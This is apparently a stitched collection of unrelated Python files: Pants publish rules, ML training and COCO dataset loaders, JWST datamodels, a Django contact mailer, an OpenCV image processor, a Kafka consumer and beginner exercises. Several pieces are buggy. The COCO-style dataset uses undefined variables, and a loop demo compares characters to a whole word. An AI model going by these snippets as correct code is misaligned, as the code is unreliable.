Get(
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest(
PublishFieldSet,
goal_description="the `publish` goal",
no_applicable_targets_behavior=NoApplicableTargetsBehavior.warn,
),
),
)
# Only keep field sets that both package something, and have something to publish.
targets = set(target_roots_to_package_field_sets.targets).intersection(
set(target_roots_to_publish_field_sets.targets)
)
if not targets:
return Publish(exit_code=0)
# Build all packages and request the processes to run for each field set.
processes = await MultiGet(
Get(
PublishProcesses,
PublishProcessesRequest(
target_roots_to_package_field_sets.mapping[tgt],
target_roots_to_publish_field_sets.mapping[tgt],
),
)
for tgt in targets
)
# Run all processes interactively.
exit_code: int = 0
outputs: list[PublishOutputData] = []
results: list[str] = []
for pub in chain.from_iterable(processes):
if not pub.process:
sigil = console.sigil_skipped()
status = "skipped"
if pub.description:
status += f" {pub.description}"
for name in pub.names:
results.append(f"{sigil} {name} {status}.")
outputs.append(pub.get_output_data(published=False, status=status))
continue
logger.debug(f"Execute {pub.process}")
res = await Effect(
InteractiveProcessResult,
{pub.process: InteractiveProcess, local_environment.val: EnvironmentName},
)
if res.exit_code == 0:
sigil = console.sigil_succeeded()
status = "published"
prep = "to"
else:
sigil = console.sigil_failed()
status = "failed"
prep = "for"
exit_code = res.exit_code
if pub.description:
status += f" {prep} {pub.description}"
for name in pub.names:
results.append(f"{sigil} {name} {status}.")
outputs.append(
pub.get_output_data(
exit_code=res.exit_code,
published=res.exit_code == 0,
status=status,
)
)
console.print_stderr("")
if not results:
sigil = console.sigil_skipped()
console.print_stderr(f"{sigil} Nothing published.")
# We collect all results to the end, so all output from the interactive processes are done,
# before printing the results.
for line in results:
console.print_stderr(line)
# Log structured output
output_data = json.dumps(outputs, cls=_PublishJsonEncoder, indent=2, sort_keys=True)
logger.debug(f"Publish result data:\n{output_data}")
if publish.output:
with open(publish.output, mode="w") as fd:
fd.write(output_data)
return Publish(exit_code)
class _PublishJsonEncoder(json.JSONEncoder):
safe_to_str_types = (Address,)
def default(self, o):
"""Return a serializable object for o."""
if is_dataclass(o):
return asdict(o)
if isinstance(o, collections.abc.Mapping):
return dict(o)
if isinstance(o, collections.abc.Sequence):
return list(o)
try:
return super().default(o)
except TypeError:
return str(o)
@rule
async def package_for_publish(
request: PublishProcessesRequest, local_environment: ChosenLocalEnvironmentName
) -> PublishProcesses:
packages = await MultiGet(
Get(BuiltPackage, EnvironmentAwarePackageRequest(field_set))
for field_set in request.package_field_sets
)
for pkg in packages:
for artifact in pkg.artifacts:
if artifact.relpath:
logger.info(f"Packaged {artifact.relpath}")
elif artifact.extra_log_lines:
logger.info(str(artifact.extra_log_lines[0]))
publish = await MultiGet(
Get(
PublishProcesses,
{
field_set._request(packages): PublishRequest,
local_environment.val: EnvironmentName,
},
)
for field_set in request.publish_field_sets
)
# Flatten and dress each publish processes collection with data about its origin.
publish_processes = [
replace(
publish_process,
data=PublishOutputData({**publish_process.data, **field_set.get_output_data()}),
)
for processes, field_set in zip(publish, request.publish_field_sets)
for publish_process in processes
]
return PublishProcesses(publish_processes)
def rules():
return collect_rules()
|
from model.semco import SemCo
import parser as parser
import pickle
from pathlib import Path
import torch
import os
STATS = {'imagenet':((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
'mini_imagenet':((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
'cifar100':((0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761)),
'cifar10': ((0.4913, 0.4821, 0.4465), (0.247, 0.2434, 0.2615)),
'domain_net-real': ((0.6059, 0.5890, 0.5558), (0.3195, 0.3128, 0.3352)),
'mnist': ((0.1307, 0.1307, 0.1307), (0.3081, 0.3081, 0.3081)),
'fashion_mnist': ((0.286, 0.286, 0.286), (0.353, 0.353, 0.353)),
}
if __name__ == '__main__':
device = 'cuda' if torch.cuda.is_available() else 'cpu'
args = parser.parse_args() # wrapper to argparse but using same names for argparse lib
dataset_name = args.dataset_name
if args.valid_split_pickle is None and args.classes_pickle is None:
classes = pickle.load(Path(f'splits/{dataset_name}_classes.pkl').open('rb'))
valid_data = pickle.load(Path(f'splits/{dataset_name}_valid_data.pkl').open('rb'))
setattr(args, 'classes_pickle', f'splits/{dataset_name}_classes.pkl')
setattr(args, 'valid_split_pickle', f'splits/{dataset_name}_valid_data.pkl')
else:
classes = pickle.load(Path(args.classes_pickle).open('rb'))
valid_data = pickle.load(Path(args.valid_split_pickle).open('rb'))
labelled_data = pickle.load(Path(args.train_split_pickle).open('rb'))
# dataset_path = os.path.join(args.dataset_path, f"external/{dataset_name}/{dataset_name}_full/")
dataset_path = os.path.join(args.dataset_path, dataset_name)
dataset_meta = {'classes': classes}
if args.no_imgnet_pretrained or (args.model_backbone is not None and 'resnet' not in args.model_backbone):
dataset_meta['stats'] = STATS[dataset_name]
print(f'Using {dataset_name} stats for normalization')
else:
dataset_meta['stats'] = STATS['imagenet']
print(f'Using imagenet stats for normalization')
setattr(args, 'dataset_path', dataset_path)
L = len(labelled_data)
model = SemCo(args, dataset_meta, device, L)
model.train(labelled_data=labelled_data, valid_data=valid_data, save_best_model=True)
# preds = model.predict() |
# Copyright (C) 2010 Association of Universities for Research in Astronomy(AURA)
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of AURA and its representatives may not be used to
# endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY AURA ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL AURA BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
from __future__ import absolute_import, division, print_function
__version__ = '1.1.0'
import numpy as np
from os.path import basename
from astropy.extern import six
from .model_base import DataModel
from .amilg import AmiLgModel
from .asn import AsnModel
from .combinedspec import CombinedSpecModel
from .container import ModelContainer
from .contrast import ContrastModel
from .cube import CubeModel
from .cubeflat import CubeFlatModel
from .dark import DarkModel
from .darkMIRI import DarkMIRIModel
from .drizpars import DrizParsModel, NircamDrizParsModel, MiriImgDrizParsModel
from .outlierpars import OutlierParsModel, NircamOutlierParsModel, MiriImgOutlierParsModel
from .drizproduct import DrizProductModel
from .filter import FilterModel
from .flat import FlatModel
from .fringe import FringeModel
from .gain import GainModel
from .gls_rampfit import GLS_RampFitModel
from .image import ImageModel
from .ipc import IPCModel
from .irs2 import IRS2Model
from .lastframe import LastFrameModel
from .linearity import LinearityModel
from .mask import MaskModel
from .miri_ramp import MIRIRampModel
from .multiexposure import MultiExposureModel
from .multislit import MultiSlitModel
from .multispec import MultiSpecModel
from .ifucube import IFUCubeModel
from .pixelarea import PixelAreaModel
from .photom import PhotomModel, FgsPhotomModel, NircamPhotomModel, NirissPhotomModel
from .photom import NirspecPhotomModel, NirspecFSPhotomModel
from .photom import MiriImgPhotomModel, MiriMrsPhotomModel
from .quad import QuadModel
from .ramp import RampModel
from .rampfitoutput import RampFitOutputModel
from .readnoise import ReadnoiseModel
from .reset import ResetModel
from .rscd import RSCDModel
from .saturation import SaturationModel
from .spec import SpecModel
from .straylight import StrayLightModel
from .superbias import SuperBiasModel
from .util import fits_header_name
__all__ = [
'open',
'DataModel', 'AmiLgModel', 'AsnModel', 'ContrastModel',
'CubeModel', 'CubeFlatModel', 'DarkModel', 'DarkMIRIModel', 'DrizParsModel',
'NircamDrizParsModel', 'MiriImgDrizParsModel',
'DrizProductModel', 'FgsPhotomModel', 'FilterModel',
'FlatModel', 'FringeModel', 'GainModel', 'GLS_RampFitModel',
'ImageModel', 'IPCModel', 'IRS2Model', 'LastFrameModel', 'LinearityModel',
'MaskModel', 'MIRIRampModel', 'ModelContainer',
'MultiExposureModel',
'MultiSlitModel',
'MultiSpecModel', 'IFUCubeModel', 'PhotomModel', 'NircamPhotomModel',
'NirissPhotomModel', 'NirspecPhotomModel', 'NirspecFSPhotomModel',
'MiriImgPhotomModel', 'MiriMrsPhotomModel', 'QuadModel', 'RampModel',
'RampFitOutputModel', 'ReadnoiseModel', 'ResetModel', 'RSCDModel',
'SaturationModel', 'SpecModel', 'StrayLightModel']
def open(init=None, extensions=None):
"""
Creates a DataModel from a number of different types
Parameters
----------
init : shape tuple, file path, file object, astropy.io.fits.HDUList, numpy array, dict, None
- None: A default data model with no shape
- shape tuple: Initialize with empty data of the given shape
- file path: Initialize from the given file (FITS , JSON or ASDF)
- readable file object: Initialize from the given file object
- astropy.io.fits.HDUList: Initialize from the given
`~astropy.io.fits.HDUList`
- A numpy array: A new model with the data array initialized
to what was passed in.
- dict: The object model tree for the data model
extensions : list of AsdfExtension
A list of extensions to the ASDF to support when reading
and writing ASDF files.
Results
-------
model : DataModel instance
"""
from astropy.io import fits
if init is None:
return DataModel(None)
# Send _asn.json files to ModelContainer; avoid shape "cleverness" below
elif (isinstance(init, six.string_types) and
basename(init).split('.')[0].split('_')[-1] == 'asn'):
try:
m = ModelContainer(init, extensions=extensions)
except:
raise TypeError(
"init ASN not valid for ModelContainer"
)
return m
elif isinstance(init, DataModel):
# Copy the object so it knows not to close here
return init.__class__(init)
elif isinstance(init, tuple):
for item in init:
if not isinstance(item, int):
raise ValueError("shape must be a tuple of ints")
shape = init
elif isinstance(init, np.ndarray):
shape = init.shape
else:
if isinstance(init, (six.text_type, bytes)) or hasattr(init, "read"):
hdulist = fits.open(init)
elif isinstance(init, fits.HDUList):
hdulist = init
else:
raise TypeError(
"init must be None, shape tuple, file path, "
"readable file object, or astropy.io.fits.HDUList")
shape = ()
try:
hdu = hdulist[(fits_header_name('SCI'), 1)]
except KeyError:
pass
else:
if hasattr(hdu, 'shape'):
shape = hdu.shape
# Here, we try to be clever about which type to
# return, otherwise, just return a new instance of the
# requested class
if len(shape) == 0:
new_class = DataModel
elif len(shape) == 4:
# It's a RampModel, MIRIRampModel, or QuadModel
try:
dqhdu = hdulist[fits_header_name('DQ')]
except KeyError:
# It's a RampModel or MIRIRampModel
try:
refouthdu = hdulist[fits_header_name('REFOUT')]
except KeyError:
# It's a RampModel
from . import ramp
new_class = ramp.RampModel
else:
# It's a MIRIRampModel
from . import miri_ramp
new_class = miri_ramp.MIRIRampModel
else:
# It's a QuadModel
from . import quad
new_class = quad.QuadModel
elif len(shape) == 3:
# It's a CubeModel
from . import cube
new_class = cube.CubeModel
elif len(shape) == 2:
try:
hdu = hdulist[(fits_header_name('SCI'), 2)]
except (KeyError, NameError):
# It's an ImageModel
from . import image
new_class = image.ImageModel
else:
# It's a MultiSlitModel
from . import multislit
new_class = multislit.MultiSlitModel
else:
raise ValueError("Don't have a DataModel class to match the shape")
return new_class(init, extensions=extensions)
'''
def test(verbose=False) :
import nose
# get the pandokia plugin if it is available (it will only
# do anything if we are run from pandokia).
try :
import pandokia.helpers.nose_plugin as nose_plugin
except ImportError :
nose_plugin = None
if nose_plugin :
addplugins = [nose_plugin.Pdk()]
else :
addplugins = None
# get the name of the test package
argv = ['nosetests', '--exe', __name__ + '.tests']
import jwst.datamodels.tests
print ("ARGS", argv)
# run nose
return nose.main(argv = argv, addplugins=addplugins)
'''
|
import unittest
import webJoker
class TestCase(unittest.TestCase):
def setUp(self):
webJoker.app.config["TESTING"] = True
self.app = webJoker.app.test_client()
# Tests if the remote url is responsive
def test_response_webJoker(self):
response = self.app.get('/')
self.assertEqual(response.status_code, 200)
# Tests if the joke has been retrieved successfully
def test_type_webJoker(self):
page = self.app.get("/test/type")
assert 'success' in str(page.data)
# Tests if the retrived joke is valid and indexed (comes with a designated ID)
def test_id_webJoker(self):
Page = self.app.get("/test/id")
assert int(Page.data)
if __name__ == '__main__':
unittest.main()
|
import tables
import pandas as pd
import numpy as np
import csv
from scipy import stats
removestrays = lambda a: np.array([False if i < 6e9 else True for i in a])
with tables.open_file('/brildata/vdmdata17/6016_1707280758_1707280928.hd5') as hd5:
for r in hd5.root.beam:
bunchlist1 = removestrays(r['bxintensity1'])
bunchlist2 = removestrays(r['bxintensity2'])
fillednoncolliding = (bunchlist1 | bunchlist2) & ~(bunchlist1 & bunchlist2)
break
b1 = bunchlist1 & ~bunchlist2
b2 = bunchlist2 & ~bunchlist1
bim1df = []
bim2df = []
for row in hd5.root.bcm1fpcvdlumi:
bim1 = {}
bim2 = {}
for i, bx in enumerate(b1):
if not bx: continue
bim1[i]=row['bxraw'][i]
for i, bx in enumerate(b2):
if not bx: continue
bim2[i]=row['bxraw'][i]
bim1df.append(bim1)
bim2df.append(bim2)
# bim.append(row['bxraw'][fillednoncolliding])
# for r in bim:
# for i, bx in enumerate(b1):
# if not bx: continue
# bim1[i]=r[i]
# for i, bx in enumerate(b2):
# if not bx: continue
# bim2[i]=r[i]
bim1df = pd.DataFrame(bim1df)
bim2df = pd.DataFrame(bim2df)
bim1df.to_csv('bcm1fmib1.csv')
bim2df.to_csv('bcm1fmib2.csv')
av = {}
with open('mibBcmAv.csv','w') as f:
wr = csv.writer(f)
wr.writerow(['bx1','bim1', 'bim1Std', 'bim1Sem', 'bx2', 'bim2', 'bim2Std', 'bim2Sem'])
for bx1,bx2 in zip(bim1df,bim2df):
wr.writerow([bx1, np.mean(bim1df[bx1]), np.std(bim1df[bx1]), stats.sem(bim1df[bx1]),
bx2, np.mean(bim2df[bx2]), np.std(bim2df[bx2]), stats.sem(bim2df[bx2])])
# for bx in bim1df:
# print bx
# av[bx] = {}
# av[bx]['bim1'] = np.mean(bim1df[bx])
# av[bx]['bim1Std'] = np.std(bim1df[bx])
# av[bx]['bim2'] = np.mean(bim2df[bx])
# av[bx]['bim2Std'] = np.std(bim2df[bx])
# pd.DataFrame.from_dict(av).to_csv('bimbav.csv')
|
import io
from confluent_kafka import Consumer, KafkaError
from avro.io import DatumReader, BinaryDecoder
import avro.schema
schema = avro.schema.parse(open("schema/PageViews.avsc", "rb").read())
reader = DatumReader(schema)
topic = 'electric'
def decode(msg_value):
message_bytes = io.BytesIO(msg_value)
decoder = BinaryDecoder(message_bytes)
event_dict = reader.read(decoder)
return event_dict
c = Consumer()
c.subscribe(topic)
running = True
while running:
msg = c.poll()
if not msg.error():
msg_value = msg.value()
event_dict = decode(msg_value)
print(event_dict)
elif msg.error().code() != KafkaError._PARTITION_EOF:
print(msg.error())
running = False |
# https://www.tensorflow.org/guide/saved_model
import tensorflow as tf
pretrained_model = tf.keras.applications.MobileNetV2()
tf.saved_model.save(pretrained_model, "mobilenet_v2/1/")
|
import logging
from django.shortcuts import render
from django.core.urlresolvers import reverse
from django.core.mail import EmailMessage, send_mail
from django.http import HttpResponseRedirect
from django.utils import timezone
from django.contrib import messages
from .forms import ContactForm
logger = logging.getLogger(__name__)
def send_contact_form_mail(form):
cleaned_data = form.cleaned_data
subject = "Contato Techvet"
from_email = "comercial@techvet.com.br"
reply_to = cleaned_data["email"]
now = timezone.localtime(timezone.now())
day_now, hour_now = now.strftime("%D %H:%M:%S").split()
body = "Enviado em " + day_now + " às " + hour_now + "\n"
body += "\nNome: " + cleaned_data["name"]
body += "\nE-mail: " + cleaned_data["email"]
body += "\nTelefone: " + cleaned_data["phone"]
body += "\nBairro: " + cleaned_data["neighborhood"]
body += "\nServiços: " + ", ".join(cleaned_data["services"])
body += "\nGostaria de Receber Novidades por E-mail? "
body += cleaned_data["sign_newsletter"]
body += "\nComo nos conheceu? " + cleaned_data["contact_source"]
body += "\nMensagem: " + cleaned_data["message"]
email = EmailMessage(subject, body, from_email,
['comercial@techvet.com.br',
'sac@techvet.com.br'],
reply_to=[cleaned_data["email"]])
email.send()
def index(request):
return render(request, 'public/index.html')
def sobre(request):
return render(request, 'public/sobre.html')
def dedetizacao(request):
return render(request, 'public/dedetizacao.html')
def cisterna(request):
return render(request, 'public/cisterna.html')
def contato(request):
form = ContactForm(request.POST or None)
if form.is_valid():
request.session['valid_contact_form'] = True
try:
send_contact_form_mail(form)
return HttpResponseRedirect(reverse('public:contato_obrigado'))
except Exception as e:
form_error = "Ocorreu algum problema ao tentar enviar sua mensagem."\
" Tente novamente ou ligue para nós."\
" Obrigado pela compreensão!"
messages.add_message(request, messages.ERROR, form_error)
logger.error("Mail could not be sent: %s" % e)
return HttpResponseRedirect(reverse('public:contato'))
return render(request, 'public/contato.html', {'form': form})
def contato_obrigado(request):
valid_contact_form = request.session.pop('valid_contact_form', False)
if valid_contact_form:
return render(request, 'public/contato_obrigado.html')
return HttpResponseRedirect('/contato/')
|
# String Slicing
a = "Python"
0,1,2,3,4,
#print(a)
#print(a[0:-2])
b = "igffiWLIUWELIFBKUELFIBKEeUshvwKEJVDLKWFIUW"
#print(b[0:-3])
#print(len(b))
#print(len(a))
#name = input("Enter your name \t")
#print(name.upper())
#print(name.lower())
#print(len(name))
#name1 = "Python Language"
#print(name1)
#name1 = name1.replace("Python", "Ruby")
#print(name1.replace("Python", "Ruby"))
#print(name1)
username = input("Enter Full Name \t")
username = username.split(" ")
print(username)
|
import cv2
import config
import os
import numpy as np
from pathlib import Path
from flask import abort
# Класс-процессор
class ImageProcessor:
STORE_DIR = config.STORE_DIR
DEFAULT_CANVAS_COLOR_VALUE = 255
def __init__(self, path):
# common props
self.full_path = path
parts = self.full_path.split('.')
self.path = parts[0]
self.parts = self.path.split('_')
# Свойства для стриминга
self.buffer = None
self.retval = None
# Изображение
self.img = None
# Путь к сохраняемому изображению
self._img_path = None
# Свойства изображения
# id
self._id = None
# Ширина
self._width = None
# Высота
self._height = None
# Количество каналов
self._channels = 3
# Тип ресайза
self._resize = None
# Качество для сохранения
self._quality = None
# Расширение для сохранения
self._extension = parts[1]
# Опции сохранения
self._save_options = self._extension == 'jpg' and [cv2.IMWRITE_JPEG_PROGRESSIVE, 2] or []
# Массив действий для сохранения
self._actions = ['_normalize_content']
# Основной метод без сохранения
def process_without_save(self):
# Парсим параметры и назначаем действия над картинкой
self._parse()
self._assign_actions()
# Ищем оригинальную картинку по имени
# Исходим из соглашения, что оригиналы хранятся под именем "%id%.%разрешение%"
img_path = self._get_original_img_path()
# Если оригинал не найден, отдаем 404
if not img_path:
abort(404)
# Если никаких действий не требуется, отдаем оригинал
if not self._actions:
self._img_path = img_path
return
self._check_extension(img_path)
try:
self.img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
# http://jira.opentech.local/browse/SHOP-919
# Как оказалось, Ч/Б изображения идут с одним каналом, который при открытии не попадает в tuple.
# В таком случае присваиваем tuple 1 канал.
shape = self.img.shape
self._channels = (len(shape) > 2) and shape[-1] or 1
except:
abort(404)
for action in self._actions:
getattr(self, action, None)()
retval, buffer = cv2.imencode('.' + self._extension, self.img)
self.retval = retval
self.buffer = buffer
# Основной метод с сохранением
def process_with_save(self):
# Если файл уже имеется, ничего не делаем
abs_path = self.STORE_DIR + self.full_path
self._img_path = abs_path
if Path(abs_path).is_file():
return
# Парсим параметры и назначаем действия над картинкой
self._parse()
self._assign_actions()
# Ищем оригинальную картинку по имени
# Исходим из соглашения, что оригиналы хранятся под именем "%id%.%разрешение%"
img_path = self._get_original_img_path()
if not img_path:
abort(404)
# Никаких действий не требуется, отдаем оригинал
if not self._actions:
self._img_path = img_path
return
self._check_extension(img_path)
try:
self.img = cv2.imread(img_path)
except:
abort(404)
for action in self._actions:
getattr(self, action, None)()
cv2.imwrite(abs_path, self.img, self._save_options)
# Получить полный путь к созданному изображению
def get_full_path(self):
return self._img_path
# Получить mimetype изображения
def get_mimetype(self):
return 'image/' + self._extension
# Не конвертируем png в jpg из-за проблем с прозрачностью
def _check_extension(self, img_path):
if img_path.endswith('.png'):
self._extension = 'png'
# Получить путь к изображению
def _get_original_img_path(self):
img_path = None
for ext in config.ORIGINAL_EXTENSIONS:
path = os.path.join(self.STORE_DIR, "{0}.{1}".format(self._id, ext))
if not Path(path).is_file():
continue
img_path = path
return img_path
# Парсинг пути, назначение необходимых процедур
def _parse(self):
for part in self.parts:
for param_name in ['id', 'resize', 'width', 'height', 'quality']:
self._parse_param(part, param_name)
# Назначить действия
def _assign_actions(self):
if self._resize:
self._actions.append('_' + self._resize)
if self._quality:
self._actions.append('_change_quality')
# Валидация числового параметра
def _validate_digit_param(self, name, value):
limit = config.FIELDS_LIMITS.get(name, None)
if not limit:
return
if value > limit:
abort(400)
# Парсинг параметров
def _parse_param(self, part, param_name):
if getattr(self, '_' + param_name):
return
part_values = part.split('-')
if len(part_values) < 2:
abort(400)
key, value = part_values
if key != param_name:
return
if value.isdigit():
value = int(value)
self._validate_digit_param(key, value)
setattr(self, '_' + param_name, value)
# Получить размеры для ресайза cover
def _get_sizes_cover(self):
original_height, original_width = self.img.shape[:2]
aspect_ratio = original_height / original_width
# Сохраняем пропорции
if aspect_ratio > 1:
width = self._width
height = int(width * aspect_ratio)
elif aspect_ratio == 1.0:
width = self._width
height = width
else:
height = self._height
width = int(height / aspect_ratio)
return width, height
# Получить размеры для ресайза contain
def _get_sizes_contain(self):
original_height, original_width = self.img.shape[:2]
aspect_ratio = original_height / original_width
# Сохраняем пропорции
if aspect_ratio > 1:
height = self._height
width = int(height / aspect_ratio)
elif aspect_ratio == 1.0:
width = self._width
height = width
else:
width = self._width
height = int(width * aspect_ratio)
return width, height
# Создание канвы
def _create_canvas(self, height=None, width=None):
new_height = height or self._height
new_width = width or self._width
canvas = np.ndarray(shape=(new_height, new_width, self._channels), dtype=self.img.dtype)
canvas_color_value = self.DEFAULT_CANVAS_COLOR_VALUE
# Если присутствует альфа-канал, делаем цвет как у альфа-канала, основываясь на первом пикселе
if self._extension == 'png' and self._channels == 4:
canvas_color_value = self.img.item(0, 0, -1)
canvas[:] = tuple([canvas_color_value] * self._channels)
return canvas
# Проверка self.img.shape, так как shape после действия пересобирается cv
def _check_img_shape(self):
if len(self.img.shape) == 2:
self.img.shape += (1, )
# Ресайз изображения
def _make_resize(self):
if not self._resize or self._resize not in ['cover', 'contain']:
return
width, height = getattr(self, '_get_sizes_' + self._resize)()
self.img = cv2.resize(
self.img,
(
width,
height
),
interpolation=cv2.INTER_LINEAR
)
# Resize contain
def _contain(self):
self._make_resize()
self._check_img_shape()
canvas = self._create_canvas()
height, width = self.img.shape[:2]
if height > width:
offset = abs(int((self._width - width) / 2))
canvas[0:height, offset:offset + width, :self._channels] = self.img
elif height < width:
offset = abs(int((self._height - height) / 2))
canvas[offset:offset + height, 0:width, :self._channels] = self.img
else:
canvas[:height, :width, :self._channels] = self.img
self.img = canvas
# Resize cover
def _cover(self):
self._make_resize()
self._check_img_shape()
canvas = self._create_canvas()
height, width = self.img.shape[:2]
if height > width:
offset = abs(int((height - self._height) / 2))
canvas = self.img[offset:offset + self._height, 0:width]
elif height < width:
offset = abs(int((width - self._width) / 2))
canvas = self.img[0:height, offset:offset + self._width]
else:
canvas[:height, :width, :self._channels] = self.img
self.img = canvas
# Изменение качества
def _change_quality(self):
if self._extension == 'jpg':
self._save_options += [cv2.IMWRITE_JPEG_QUALITY, self._quality]
elif self._extension == 'webp':
self._save_options += [int(cv2.IMWRITE_WEBP_QUALITY), self._quality]
elif self._extension == 'png':
pass
# Выдаем ошибку во всех остальных случаях
else:
abort(400)
# Нормализация контента
def _normalize_content(self):
self._check_img_shape()
(y, x, _) = np.where(self.img != tuple([255] * self._channels))
(top_y, top_x) = (np.min(y), np.min(x))
(bottom_y, bottom_x) = (np.max(y), np.max(x))
self.img = self.img[top_y:bottom_y, top_x:bottom_x]
height, width = self.img.shape[:2]
canvas_px = 0 if self._extension == 'png' else config.NORMALIZE_CANVAS_PX
fields_px = 0 if self._extension == 'png' else config.NORMALIZE_FIELDS_PX
if height < width:
canvas = self._create_canvas(height, width + canvas_px)
canvas[:height, fields_px:width + fields_px, :self._channels] = self.img
elif height > width:
canvas = self._create_canvas(height + canvas_px, width)
canvas[fields_px:height + fields_px, :width, :self._channels] = self.img
else:
canvas = self._create_canvas(height + canvas_px, width + canvas_px)
canvas[fields_px:height + fields_px, fields_px:width + fields_px, :self._channels] = self.img
self.img = canvas
|
from torchvision import datasets, transforms
from torchvision.datasets.vision import VisionDataset
from base import BaseDataLoader
import os
from PIL import Image
from .utils import coco_utils
class WaterMeterDataset(object):
def __init__(self, root, transforms):
self.root = root
self.transforms = transforms
# load all image files, sorting them to
# ensure that they are aligned
self.imgs = list(sorted(os.listdir(os.path.join(root, "PNGImages"))))
def __getitem__(self, idx):
# load images ad masks
img_path = os.path.join(self.root, "images/train2017", self.imgs[idx])
target_path = os.path.join(self.root, "annotations/", self.masks[idx])
img = Image.open(img_path).convert("RGB")
w, h = img.size
image_id = target["image_id"]
image_id = torch.tensor([image_id])
anno = target["annotations"]
anno = [obj for obj in anno if obj['iscrowd'] == 0]
boxes = [obj["bbox"] for obj in anno]
# guard against no boxes via resizing
boxes = torch.as_tensor(boxes, dtype=torch.float32).reshape(-1, 4)
boxes[:, 2:] += boxes[:, :2]
boxes[:, 0::2].clamp_(min=0, max=w)
boxes[:, 1::2].clamp_(min=0, max=h)
classes = [obj["category_id"] for obj in anno]
classes = torch.tensor(classes, dtype=torch.int64)
segmentations = [obj["segmentation"] for obj in anno]
masks = convert_coco_poly_to_mask(segmentations, h, w)
keypoints = None
if anno and "keypoints" in anno[0]:
keypoints = [obj["keypoints"] for obj in anno]
keypoints = torch.as_tensor(keypoints, dtype=torch.float32)
num_keypoints = keypoints.shape[0]
if num_keypoints:
keypoints = keypoints.view(num_keypoints, -1, 3)
keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
boxes = boxes[keep]
classes = classes[keep]
masks = masks[keep]
if keypoints is not None:
keypoints = keypoints[keep]
target = {}
target["boxes"] = boxes
target["labels"] = classes
target["masks"] = masks
target["image_id"] = image_id
if keypoints is not None:
target["keypoints"] = keypoints
# for conversion to coco api
area = torch.tensor([obj["area"] for obj in anno])
iscrowd = torch.tensor([obj["iscrowd"] for obj in anno])
target["area"] = area
target["iscrowd"] = iscrowd
if self.transforms is not None:
img, target = self.transforms(img, target)
return img, target
def __len__(self):
return len(self.imgs)
class CocoDataset(VisionDataset):
"""`MS Coco Detection <http://mscoco.org/dataset/#detections-challenge2016>`_ Dataset.
Args:
root (string): Root directory where images are downloaded to.
annFile (string): Path to json annotation file.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.ToTensor``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
transforms (callable, optional): A function/transform that takes input sample and its target as entry
and returns a transformed version.
"""
def __init__(self, root, annFile, train=True, transforms=None):
super(CocoDataset, self).__init__(root, transforms)
from pycocotools.coco import COCO
if train:
self.coco = COCO(annFile+'train2017.json')
else:
self.coco = COCO(annFile+'val2017.json')
self.ids = list(sorted(self.coco.imgs.keys()))
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: Tuple (image, target). target is the object returned by ``coco.loadAnns``.
"""
coco = self.coco
img_id = self.ids[index]
ann_ids = coco.getAnnIds(imgIds=img_id)
target = coco.loadAnns(ann_ids)
path = coco.loadImgs(img_id)[0]['file_name']
img = Image.open(os.path.join(self.root, path)).convert('RGB')
# 转为Mask
t = [coco_utils.ConvertCOCOPolyToMask()]
if self.transform is not None:
self.transforms.append(t)
img, target = self.transform(img, target)
return img, target
def __len__(self):
return len(self.ids)
class CocoDataLoader(BaseDataLoader):
"""
MNIST data loading demo using BaseDataLoader
"""
def __init__(self, data_dir, annFile, batch_size, shuffle=True, validation_split=0.0, num_workers=1, training=True):
trsfm = transforms.Compose([
transforms.ToTensor()
])
self.data_dir = data_dir
self.annFile = annFile
self.dataset = CocoDataset(self.data_dir, self.annFile, train=training, transforms=trsfm)
super().__init__(self.dataset, batch_size, shuffle, validation_split, num_workers)
|
def main():
satring = 'this is a string'
# Print string and skip all s's.
for c in satring:
if c == 'satring':
continue
print(c, end='')
print()
# Print string and stop at first s.
for c in satring:
if c == 'satring':
break
print(c, end='')
print()
# For Loop Else continues after last iterator value.
for c in satring:
print(c, end='')
else:
print(" else ")
if __name__ == "__main__": main()
|
import logging
from logging.handlers import RotatingFileHandler
import os
import yaml
import time
config_file = "/opt/cortx/component/component_config.yaml"
def read_log_location():
with open(config_file) as f:
conf = yaml.load(f, Loader=yaml.loader.SafeLoader)
log_dir = (conf["log_config"]["log_path"])
os.makedirs(log_dir, exist_ok=True)
return log_dir
if __name__ == "__main__":
i = 0
log_dir = read_log_location()
log_file = os.path.join(log_dir, "component.log")
logger = logging.getLogger('logger-with-rotation')
handler = RotatingFileHandler(log_file, maxBytes=200, backupCount=10)
logger.addHandler(handler)
logger.setLevel(logging.INFO)
try:
while True:
logger.info(f"Logging the count {i}")
print(".")
i += 1
time.sleep(2)
except KeyboardInterrupt:
print("\nShutting down the logger.")
exit(0)
|
import numpy as np
training_set_inputs = np.array([[0,0,1], [1,1,1], [1,0,1], [0,1,0]])
training_set_outputs = np.array([[0, 1, 1, 0]]).T
class NeuralNetwork():
def __init__(self):
